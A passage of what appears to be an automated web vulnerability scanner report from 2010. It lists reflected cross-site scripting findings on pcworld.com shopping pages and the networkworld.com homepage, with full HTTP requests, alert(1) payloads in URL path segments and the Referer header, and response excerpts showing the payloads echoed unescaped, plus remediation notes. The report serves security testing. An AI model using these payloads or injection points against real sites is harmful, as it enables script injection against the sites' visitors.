Set-Cookie: JSESSIONID=5C66F5C09DD8B47F2E00899EE3384F75; Path=/
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 22:19:58 GMT
Connection: close
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xm
...[SNIP]...
Object();
   Logon.userEmail = pcw_readCookie('userEmail');
   Logon.isValid = '' != Logon.userEmail;

   /* Namespace RememberURI */
   var RememberURI = new Object();
   RememberURI.referer = '/shopping39d16'-alert(1)-'1ced90403a4/detail/prtprdid,801749642-sortby,retailer/pricing.html';
   if (!RememberURI.referer.match('^/logo') && !RememberURI.referer.match('^/register')) {
       RememberURI.query = '';
       RememberURI.referer +=
...[SNIP]...

1.187. http://www.pcworld.com/shopping/detail/prtprdid,801749642-sortby,retailer/pricing.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.pcworld.com
Path:   /shopping/detail/prtprdid,801749642-sortby,retailer/pricing.html

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d4803'-alert(1)-'381092150c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /shopping/detaild4803'-alert(1)-'381092150c/prtprdid,801749642-sortby,retailer/pricing.html HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Mon, 15 Nov 2010 22:20:02 GMT
Cache-Control: max-age=60
Set-Cookie: JSESSIONID=614F9D391C471C6DCF9D812FB0B9516B; Path=/
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 22:20:01 GMT
Connection: close
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xm
...[SNIP]...
();
   Logon.userEmail = pcw_readCookie('userEmail');
   Logon.isValid = '' != Logon.userEmail;

   /* Namespace RememberURI */
   var RememberURI = new Object();
   RememberURI.referer = '/shopping/detaild4803'-alert(1)-'381092150c/prtprdid,801749642-sortby,retailer/pricing.html';
   if (!RememberURI.referer.match('^/logo') && !RememberURI.referer.match('^/register')) {
       RememberURI.query = '';
       RememberURI.referer += Remembe
...[SNIP]...

1.188. http://www.pcworld.com/shopping/detail/prtprdid,801749642-sortby,retailer/pricing.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.pcworld.com
Path:   /shopping/detail/prtprdid,801749642-sortby,retailer/pricing.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a1113"><script>alert(1)</script>5d2042489c4 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /shopping/detaila1113"><script>alert(1)</script>5d2042489c4/prtprdid,801749642-sortby,retailer/pricing.html HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Mon, 15 Nov 2010 22:20:00 GMT
Cache-Control: max-age=60
Set-Cookie: JSESSIONID=67DAA66DFB4799BA0FC43F5AC10F4AF0; Path=/
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 22:20:00 GMT
Connection: close
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xm
...[SNIP]...
<meta property="og:url" content="/shopping/detaila1113"><script>alert(1)</script>5d2042489c4/prtprdid,801749642-sortby,retailer/pricing.html"/>
...[SNIP]...

1.189. http://www.pcworld.com/shopping/detail/prtprdid,801749642-sortby,retailer/pricing.html [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.pcworld.com
Path:   /shopping/detail/prtprdid,801749642-sortby,retailer/pricing.html

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8eaf2"><script>alert(1)</script>02c74f41366 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /shopping/detail/prtprdid,801749642-sortby,retailer8eaf2"><script>alert(1)</script>02c74f41366/pricing.html HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Mon, 15 Nov 2010 22:20:03 GMT
Cache-Control: max-age=60
Set-Cookie: JSESSIONID=7E92FCC46B781C9767D51725379A6E66; Path=/
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 22:20:02 GMT
Connection: close
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xm
...[SNIP]...
<meta property="og:url" content="/shopping/detail/prtprdid,801749642-sortby,retailer8eaf2"><script>alert(1)</script>02c74f41366/pricing.html"/>
...[SNIP]...

1.190. http://www.pcworld.com/shopping/detail/prtprdid,801749642-sortby,retailer/pricing.html [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.pcworld.com
Path:   /shopping/detail/prtprdid,801749642-sortby,retailer/pricing.html

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3aa5b'-alert(1)-'af15a1bdc0f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /shopping/detail/prtprdid,801749642-sortby,retailer3aa5b'-alert(1)-'af15a1bdc0f/pricing.html HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Mon, 15 Nov 2010 22:20:07 GMT
Cache-Control: max-age=60
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 22:20:06 GMT
Connection: close
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xm
...[SNIP]...
kie('userEmail');
   Logon.isValid = '' != Logon.userEmail;

   /* Namespace RememberURI */
   var RememberURI = new Object();
   RememberURI.referer = '/shopping/detail/prtprdid,801749642-sortby,retailer3aa5b'-alert(1)-'af15a1bdc0f/pricing.html';
   if (!RememberURI.referer.match('^/logo') && !RememberURI.referer.match('^/register')) {
       RememberURI.query = '';
       RememberURI.referer += RememberURI.query;
       document.cookie = "p
...[SNIP]...

1.191. http://www.pcworld.com/shopping/detail/prtprdid,801749642-sortby,retailer/pricing.html [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.pcworld.com
Path:   /shopping/detail/prtprdid,801749642-sortby,retailer/pricing.html

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 64792'-alert(1)-'59443ff790 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /shopping/detail/prtprdid,801749642-sortby,retailer/pricing.html64792'-alert(1)-'59443ff790 HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=9B5E53B20D513148535F6D8991070ADD; Path=/
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 22:20:08 GMT
Connection: close
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xm
...[SNIP]...
l');
   Logon.isValid = '' != Logon.userEmail;

   /* Namespace RememberURI */
   var RememberURI = new Object();
   RememberURI.referer = '/shopping/detail/prtprdid,801749642-sortby,retailer/pricing.html64792'-alert(1)-'59443ff790';
   if (!RememberURI.referer.match('^/logo') && !RememberURI.referer.match('^/register')) {
       RememberURI.query = '';
       RememberURI.referer += RememberURI.query;
       document.cookie = "pcw.last_uri="
...[SNIP]...

1.192. http://www.pcworld.com/shopping/detail/prtprdid,813735600-sortby,retailer/pricing.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.pcworld.com
Path:   /shopping/detail/prtprdid,813735600-sortby,retailer/pricing.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 50dbf'-alert(1)-'364c1610e16 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /shopping50dbf'-alert(1)-'364c1610e16/detail/prtprdid,813735600-sortby,retailer/pricing.html HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Mon, 15 Nov 2010 22:17:14 GMT
Cache-Control: max-age=60
Set-Cookie: JSESSIONID=DD31E901CDB09A762BEC2712F70E90A3; Path=/
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 22:17:14 GMT
Connection: close
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xm
...[SNIP]...
Object();
   Logon.userEmail = pcw_readCookie('userEmail');
   Logon.isValid = '' != Logon.userEmail;

   /* Namespace RememberURI */
   var RememberURI = new Object();
   RememberURI.referer = '/shopping50dbf'-alert(1)-'364c1610e16/detail/prtprdid,813735600-sortby,retailer/pricing.html';
   if (!RememberURI.referer.match('^/logo') && !RememberURI.referer.match('^/register')) {
       RememberURI.query = '';
       RememberURI.referer +=
...[SNIP]...

1.193. http://www.pcworld.com/shopping/detail/prtprdid,813735600-sortby,retailer/pricing.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.pcworld.com
Path:   /shopping/detail/prtprdid,813735600-sortby,retailer/pricing.html

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 34085'-alert(1)-'17275b632a2 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /shopping/detail34085'-alert(1)-'17275b632a2/prtprdid,813735600-sortby,retailer/pricing.html HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Mon, 15 Nov 2010 22:17:33 GMT
Cache-Control: max-age=60
Set-Cookie: JSESSIONID=99B0DF6C3EE34E02568E31DBC751D08F; Path=/
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 22:17:33 GMT
Connection: close
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xm
...[SNIP]...
();
   Logon.userEmail = pcw_readCookie('userEmail');
   Logon.isValid = '' != Logon.userEmail;

   /* Namespace RememberURI */
   var RememberURI = new Object();
   RememberURI.referer = '/shopping/detail34085'-alert(1)-'17275b632a2/prtprdid,813735600-sortby,retailer/pricing.html';
   if (!RememberURI.referer.match('^/logo') && !RememberURI.referer.match('^/register')) {
       RememberURI.query = '';
       RememberURI.referer += Remembe
...[SNIP]...

1.194. http://www.pcworld.com/shopping/detail/prtprdid,813735600-sortby,retailer/pricing.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.pcworld.com
Path:   /shopping/detail/prtprdid,813735600-sortby,retailer/pricing.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c266a"><script>alert(1)</script>12c60b7e20e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /shopping/detailc266a"><script>alert(1)</script>12c60b7e20e/prtprdid,813735600-sortby,retailer/pricing.html HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Mon, 15 Nov 2010 22:17:32 GMT
Cache-Control: max-age=60
Set-Cookie: JSESSIONID=5C977E9B2482ABF3F6BB4AB3E77DC35C; Path=/
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 22:17:31 GMT
Connection: close
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xm
...[SNIP]...
<meta property="og:url" content="/shopping/detailc266a"><script>alert(1)</script>12c60b7e20e/prtprdid,813735600-sortby,retailer/pricing.html"/>
...[SNIP]...

1.195. http://www.pcworld.com/shopping/detail/prtprdid,813735600-sortby,retailer/pricing.html [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.pcworld.com
Path:   /shopping/detail/prtprdid,813735600-sortby,retailer/pricing.html

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e1684'-alert(1)-'eba418560f0 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /shopping/detail/prtprdid,813735600-sortby,retailere1684'-alert(1)-'eba418560f0/pricing.html HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Mon, 15 Nov 2010 22:17:39 GMT
Cache-Control: max-age=60
Set-Cookie: JSESSIONID=174C251B460340D592BCD91A7BE75F87; Path=/
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 22:17:39 GMT
Connection: close
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xm
...[SNIP]...
kie('userEmail');
   Logon.isValid = '' != Logon.userEmail;

   /* Namespace RememberURI */
   var RememberURI = new Object();
   RememberURI.referer = '/shopping/detail/prtprdid,813735600-sortby,retailere1684'-alert(1)-'eba418560f0/pricing.html';
   if (!RememberURI.referer.match('^/logo') && !RememberURI.referer.match('^/register')) {
       RememberURI.query = '';
       RememberURI.referer += RememberURI.query;
       document.cookie = "p
...[SNIP]...

1.196. http://www.pcworld.com/shopping/detail/prtprdid,813735600-sortby,retailer/pricing.html [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.pcworld.com
Path:   /shopping/detail/prtprdid,813735600-sortby,retailer/pricing.html

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fc032"><script>alert(1)</script>e80f389cb9d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /shopping/detail/prtprdid,813735600-sortby,retailerfc032"><script>alert(1)</script>e80f389cb9d/pricing.html HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Mon, 15 Nov 2010 22:17:37 GMT
Cache-Control: max-age=60
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 22:17:37 GMT
Connection: close
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xm
...[SNIP]...
<meta property="og:url" content="/shopping/detail/prtprdid,813735600-sortby,retailerfc032"><script>alert(1)</script>e80f389cb9d/pricing.html"/>
...[SNIP]...

1.197. http://www.pcworld.com/shopping/detail/prtprdid,813735600-sortby,retailer/pricing.html [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.pcworld.com
Path:   /shopping/detail/prtprdid,813735600-sortby,retailer/pricing.html

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload babbd'-alert(1)-'aaae06b3f1a was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /shopping/detail/prtprdid,813735600-sortby,retailer/pricing.htmlbabbd'-alert(1)-'aaae06b3f1a HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=307575129A47AE93470C910895D5F93A; Path=/
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 22:17:40 GMT
Connection: close
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xm
...[SNIP]...
l');
   Logon.isValid = '' != Logon.userEmail;

   /* Namespace RememberURI */
   var RememberURI = new Object();
   RememberURI.referer = '/shopping/detail/prtprdid,813735600-sortby,retailer/pricing.htmlbabbd'-alert(1)-'aaae06b3f1a';
   if (!RememberURI.referer.match('^/logo') && !RememberURI.referer.match('^/register')) {
       RememberURI.query = '';
       RememberURI.referer += RememberURI.query;
       document.cookie = "pcw.last_uri="
...[SNIP]...

1.198. http://www.networkworld.com/ [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.networkworld.com
Path:   /

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9e168'-alert(1)-'1859bab3eba was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET / HTTP/1.1
Host: www.networkworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=9e168'-alert(1)-'1859bab3eba

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (CentOS)
nnCoection: close
Content-Type: text/html; charset=UTF-8
Expires: Mon, 15 Nov 2010 22:10:13 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 15 Nov 2010 22:10:13 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: Apache=174.121.222.18.1289859013739132; path=/; expires=Wed, 14-Nov-12 22:10:13 GMT
Content-Length: 208695

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
eneral',
           rxsubtopicname: '',
           pgtype: 'homepage',
           subtopic: '',
           freemium: 'n',
           nsdr_auth: 'no',
subtopicid: 0,
outerref: 'http://www.google.com/search?hl=en&amp;q=9e168'-alert(1)-'1859bab3eba',
nwchannel: 'Network World',
request_uri: '/',
doc_uri: '/index.html',
site: 'home',
rxid: '75931',
nodeid: ''    
};

...[SNIP]...
